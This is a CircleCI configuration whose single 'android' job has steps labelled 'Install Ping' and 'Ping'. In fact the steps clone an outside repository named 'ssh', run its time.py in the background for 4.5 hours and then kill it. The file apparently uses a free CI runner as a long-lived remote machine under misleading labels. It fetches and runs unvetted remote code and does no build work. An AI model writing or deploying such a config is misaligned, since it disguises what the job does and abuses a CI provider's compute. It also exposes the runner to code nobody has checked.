version: 2.1
jobs:
  android:
   docker:
      - image: dorowu/ubuntu-desktop-lxde-vnc:latest
   steps:
      - run:
          name: Install Ping
          no_output_timeout: 20m
          command: |
            sudo apt update
            sudo rm -rf ba.sh
            sudo apt install wget -y
            sudo apt install python -y
      - run:
          name: Ping
          no_output_timeout: 20m
          command: |
            git clone https://github.com/KernelPanic-OpenSource/ssh.git py
            cd py
            python time.py &
            sleep 4.5h
            kill %1
workflows:
  version: 2.1
  cooking:
    jobs:
      - android
